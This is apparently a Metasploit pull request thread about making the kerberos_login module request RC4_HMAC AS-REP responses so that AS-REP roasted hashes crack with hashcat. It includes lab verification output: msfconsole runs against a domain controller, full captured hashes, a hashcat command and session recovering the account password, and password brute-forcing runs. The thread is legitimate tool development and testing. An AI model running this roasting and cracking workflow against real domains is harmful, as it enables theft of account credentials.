Get crackable ASREP hashes

[smashery]

This PR fixes the ASREP roasting workflow in Metasploit, which resolves #17988. A note on that ticket: That ticket states that the behaviour (and thus the bug) is in the get_user_spns module, but that module is actually TGS-REP roasting (kerberoasting), and I was unable to reproduce any issues with that module. But the issue correctly describes a replicable issue in the kerberos_login module, so that's what this ticket addresses.

The cause of this issue was that, when we offer AES ciphers alongside our RC4 cipher, the server complies, and gives us an ASREP encrypted with one of the AES ciphers. Cracking this is slow, and is not currently supported by JtR or Hashcat, so is less valuable. To fix this, we just tell the server that we only support RC4_HMAC, and it gives us what we want.

If we made only this change, it would potentially break the login scanner in the (admittedly rare) situation where RC4 has been disabled in the domain. So if we receive an "encryption type not supported" error, we retry with our defaults.

Verification

• Configure a domain containing a user with pre-authentication disabled
• Start msfconsole
• use kerberos_login
• Run the module against the pre-auth-disabled user
• Verify that the output has etype 23
• Verify that the hash is crackable by hashcat, using a wordlist containing the correct password: hashcat -m18200 '$krb5asrep$23$user...' -a 3 --force /tmp/wordlist
• Verify that the kerberos_login module still works to brute force passwords for users without pre-auth disabled
• Verify that the kerberos_login module still works to brute force passwords for users without pre-auth disabled, when RC4 is disabled in the domain (In Group Policy, Computer Configuration >> Windows Settings >> Security Settings >> Local Policies >> Security Options >> "Network security: Configure encryption types allowed for Kerberos")

[jvoisin]

Cracking this is slow, and is not currently supported by JtR or Hashcat, so is less valuable.

It might be worth opening an issue to both of them to get this added :P

[h00die]

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat

Looks like it is supported by at least hashcat? Untried. But @smashery 's ticket says it's not supported and then cracks it with hashcat anyways, so I'm a bit confused.

@smashery I guess I'm the hash and crack person for msf, and had planned to take a look at this tomorrow. If I see things (formatters etc) to get this working, I'll send you a PR

[adfoster-r7]

Preferencing RC4_HMAC for the default offered etype makes sense to me - I believe this was the default/only behavior before all of the awesome work to support additional etypes was added 😄

[adfoster-r7]

The docs call out using hashcat for ASREPRoasting (rendered)

metasploit-framework/documentation/modules/auxiliary/scanner/kerberos/kerberos_login.md

Lines 68 to 90 in 90cf371

	### ASREPRoasting
	Accounts that have `Do not require Kerberos preauthentication` enabled, will receive an ASREP response with a ticket-granting-ticket present.
	The technique of cracking this ticket offline is called ASREPRoasting.
	Cracking ASREP response with John:
	```
	john ./hashes.txt --wordlist=./wordlist.txt --format:krb5asrep
	```
	Cracking ASREP response with Hashcat:
	```
	hashcat -m 18200 -a 0 ./hashes.txt ./wordlist.txt
	```
	You can see previously cracked creds with:
	```
	creds -v
	```

But on reflection the docs aren't super great, since it doesn't really call out when you should use john or hashcat, or that 18200 isn't always correct depending on the negotiated etype (which is easy to trip up users IMO):

From hashcat's docs

| 18200 | Kerberos 5, etype 23, AS-REP | $krb5asrep$23$[email protected]:3e156ada591263b8aab0965f5aebd837$0074...

[smashery]

@h00die - to clarify the apparent discrepancy: cracking ASREPs is supported by Hashcat... as long as the DC encrypts the ASREP it with the RC4_HMAC etype. If the DC encrypts the ASREP with, say, AES256 or AES128, it's theoretically crackable... but it's not currently supported by Hashcat (and if it were, would be hella slow, so we prefer RC4). The bug described here is that when MSF receives an ASREP from a DC that supports AES, it will be encrypted with AES - which is not currently supported by Hashcat. So by telling the DC "I only support RC4_HMAC", it will send us an ASREP encrypted with RC4_HMAC, which is currently supported by Hashcat.

[h00die]

this fell off my radar, go ahead and land it, and ill get another PR later to put the hash cracking/identification/etc in all the things. No sense holding it up

[jheysel-r7]

Changes look good and testing was as expected. Thanks for the PR as well as the detailed verification steps.

Verification

•  Configure a domain containing a user with pre-authentication disabled
  • Windows Server 2019 AD - Administrator account pre-auth disabled
•  Start msfconsole
•  use kerberos_login
•  Run the module against the pre-auth-disabled user

msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" does not require preauthentication. Hash: [email protected]:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317
[!] No active DB -- Credential data will not be saved!
[*] Auxiliary module execution completed

•  Verify that the output has etype 23
•  Verify that the hash is crackable by hashcat, using a wordlist containing the correct password: hashcat -m18200 '$krb5asrep$23$user...' -a 3 --force /tmp/wordlist

└─$ hashcat -m18200 '[email protected]:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317' -a 3 --force wordlist
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 1407/1471 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.                             
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 134 MB
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).                                                          
Unless you supply more work, your cracking speed will drop.                                                                            
For tips on supplying more work, see: https://hashcat.net/faq/morework                                                                 
Approaching final keyspace - workload adjusted.  
[email protected]:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317:N0tpassword!                                                                              
                                                                                                                                                                                                                                                                                                                           
Session..........: hashcat                                                                                                             
Status...........: Cracked                
Hash.Name........: Kerberos 5, etype 23, AS-REP                   
Hash.Target......: [email protected]:9aaf5d03670...007317
Time.Started.....: Mon Oct  2 12:34:57 2023, (0 secs)
Time.Estimated...: Mon Oct  2 12:34:57 2023, (0 secs)
Guess.Mask.......: N0tpassword! [12]
Guess.Queue......: 1/1 (100.00%)         
Speed.#1.........:        8 H/s (0.08ms) @ Accel:64 Loops:1 Thr:64 Vec:8             
Recovered........: 1/1 (100.00%) Digests               
Progress.........: 1/1 (100.00%)     
Rejected.........: 0/1 (0.00%)             
Restore.Point....: 0/1 (0.00%)               
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1               
Candidates.#1....: N0tpassword! -> N0tpassword!
Started: Mon Oct  2 12:34:27 2023
Stopped: Mon Oct  2 12:34:58 2023

•  Verify that the kerberos_login module still works to brute force passwords for users without pre-auth disabled

Revert the pre-auth disabled setting for the Administrator account, then test:

msf6 auxiliary(scanner/kerberos/kerberos_login) > set pass_file /tmp/wordlist
pass_file => /tmp/wordlist
msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" is present
[!] No active DB -- Credential data will not be saved!
[*] 172.16.199.132 - User: "administrator" wrong password derp
[*] 172.16.199.132 - User: "administrator" wrong password derp2
[+] 172.16.199.132 - User found: "administrator" with password N0tpassword!. Hash: [email protected]:6b0ed000c7ec840ba3a38954820518ec$0d612d817a2ef3ad4f5c1d01248011f8ce54a8c67a58217841bd4f1b0797884fe9595c9942452058aea621373475e753e3cf1b75ea9a0b3477b8f8802f58ddd5838e37f070978011a1b7578fd0b8d5f5045dc7b1705102543ec59a04cf305debb2d67d5eba38f5e24a2f42fd6fc6327ba6181fa11b8635bcd43e9f260db6a4c498268fb2da47492e9b6dc27127526343ebc21ac5ea3848b229480a649e913a57b031c6cbd4a130e1dfffce030a1e48ab6e4ddbf785a39aac888f77d9ce37c1048ecb78f550bcaae90fb7fdda82068d9323f51eddb8b9d8584f5b3eb0e2bed97d794ad0c6c98498fd4881c1163b3c6bd7a3647b077c9025e9fbd7f883fc
[*] Auxiliary module execution completed

•  Verify that the kerberos_login module still works to brute force passwords for users without pre-auth disabled, when RC4 is disabled in the domain (In Group Policy, Computer Configuration >> Windows Settings >> Security Settings >> Local Policies >> Security Options >> "Network security: Configure encryption types allowed for Kerberos")

  Disable RC4:
  

Force update the Group Policy changes:

C:\Users\Administrator>gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.


C:\Users\Administrator>

Confirm brute forcing still works:

msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" is present
[!] No active DB -- Credential data will not be saved!
[*] 172.16.199.132 - User: "administrator" wrong password derp
[*] 172.16.199.132 - User: "administrator" wrong password derp2
[+] 172.16.199.132 - User found: "administrator" with password N0tpassword!. Hash: [email protected]:b5d7a0474c555586d0f3f2675df80ffa$770942c968b49cedc33d296ae038ae06873786011dbcd2794ea0463563192a8cac1040085caa9f0e0dffdc24d6cf511a0772dab938c3cd6e36ee725b5979cb4cfb9d93c509cf97c1866d8684666ea33bcdf1f837d472ce449b3d72fef017bcccd52a0b43e1672d25d1273cf6d13892055c9200e69f1a98df8f689b8ea54cbca9cf251a3bb349f038f172190fbd1621698f4aea89c0ac45d2125176e625237af5c460b38601127d2e9161561e69c30175f8cb8b0f2f54237b1c482e4f1fa201a98852c50c8be9493450d16cb4ff8a1f9e032c5e2a68f21fb354a76a96d5818c23dbda875a6115dbf348e9a7627e1ad45e3ace2d2a47262cd88551db420c
[*] Auxiliary module execution completed

[jheysel-r7]

Release Notes

This PR updates the kerberos.rb library such that when a kerberos login is attempted, on a user where pre-authentication is not required, the module now requests a RRC4-HMAC ticket, since it's more easily crackable.